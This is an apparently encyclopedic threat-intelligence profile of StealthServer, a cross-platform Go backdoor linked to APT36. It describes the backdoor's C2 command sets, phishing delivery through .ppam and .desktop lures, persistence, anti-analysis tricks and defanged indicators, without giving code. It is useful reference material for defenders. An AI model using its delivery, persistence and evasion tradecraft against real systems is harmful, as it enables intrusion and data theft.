StealthServer

StealthServer is a Golang backdoor family targeting both Windows and Linux systems, observed in campaigns against entities in a South Asian country and assessed by reporting to likely be linked to APT36 / Transparent Tribe based on overlapping TTPs and infrastructure patterns. It is described as a cross-platform backdoor and, in related reporting, as a Windows variant of DeskRAT.

Its core capabilities are executing arbitrary commands from command-and-control infrastructure and exfiltrating files from compromised hosts. Reported command sets include Windows commands such as LIST, UPLOAD, and DOWNLOAD; Linux HTTP-variant commands such as browse, upload, and execute; and Linux WebSocket-variant commands such as browse_files, upload_execute, start_collection, ping, welcome, and heartbeat. Linux file collection reportedly scans recursively from / for documents and archives including .pdf, .doc, .xls, .ppt, .txt, .zip, and .rar. One Linux variant uploads files using AES-GCM-encrypted HTTP POST requests with headers including X-Username, X-File-Name, and X-Nonce.

Multiple iterative variants were reported. Windows variants evolved from plain TCP JSON communications to XOR-protected TCP and then WebSocket C2. Linux variants included both HTTP- and WebSocket-based implementations. Anti-analysis features include junk-code and dummy-function insertion, VM/sandbox and debugger checks, and traffic-noise generation through repeated access to benign domains such as google.com and microsoft.com; one Windows variant also contacted cloudflare.com, amazon.com, facebook.com, and httpbin.org.

Observed delivery relied on phishing lures masquerading as PDF-related files that opened decoy documents while executing the payload silently. Windows delivery included a malicious macro-enabled PPT add-in file, "PM & Est Sanction Final 2025.ppam." Linux delivery commonly used malicious .desktop launcher files such as "Meeting_Ltr_ID1543ops.pdf.desktop" and "PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop," which opened decoy PDFs and fetched hex-encoded ELF payloads that were converted back to binaries with xxd and executed. Decoy content reportedly referenced political, military, procurement, or conference themes, and Google Drive decoys were commonly used.

Persistence was reported on both platforms. Windows variants copied themselves to %APPData% as nodejs.exe, set hidden/system attributes, added a Run key entry, created a Startup shortcut, and created/started a service named "NodeJSUpdater" with display name "Node.js Background Updater." Related reporting also mentions PowerShell-based persistence. Linux persistence methods included systemd user services, crontab @reboot, and bash profile modifications.

Reported infrastructure and IoCs include C2 domains modindia[.]serveminecraft.net, modgovindia[.]space, kavach[.]space, seemysitelive[.]store, sinjita[.]store, sinjita[.]space, solarwindturbine[.]site, windturbine[.]website, seeconnectionalive[.]website, discoverlive[.]site, and cloudstore[.]cam; IPs 101.99.94[.]109, 45.155.54[.]122, and 45.155.54[.]62; Windows-V3 WebSocket C2 ws://kavach[.]space:5500; Linux-V1 HTTP C2 modgovindia[.]space:4000 with /health, /commands, and /command-response; Linux-V2 WebSocket C2 ws://seemysitelive[.]store:8080/ws; staging URLs including https://securestore[.]cv/ghg/Mt_dated_29.txt and filestore[.]space-hosted payload/decoy paths; and Go build/source path artifacts such as D:/bossmaya/newblkul/client/client_obfuscated.go and D:/bossmaya/client/obfuscated_client.go. Asset searches reportedly found live admin pages titled "Stealth Server - Login."